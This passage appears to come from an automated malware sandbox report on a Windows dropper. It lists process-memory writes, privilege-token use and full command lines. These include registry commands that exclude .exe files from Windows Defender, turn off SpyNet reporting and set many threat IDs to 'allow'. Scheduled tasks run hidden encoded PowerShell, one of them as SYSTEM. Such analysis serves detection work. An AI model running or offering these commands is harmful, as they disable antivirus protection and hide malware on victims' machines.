N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2240 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2240 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2176 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2944 wrote to memory of 1200 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 1200 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 1200 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1200 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2176 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3528 wrote to memory of 2336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3528 wrote to memory of 2336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2176 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2496 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 3680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3944 wrote to memory of 3680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3944 wrote to memory of 3680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 1004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 1004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe

.\Install.exe /zkizdidrXl "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzPXhdsBX" /SC once /ST 07:09:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzPXhdsBX"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzPXhdsBX"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe\" hl /YHsite_idMhh 385118 /S" /V1 /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4492 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe hl /YHsite_idMhh 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

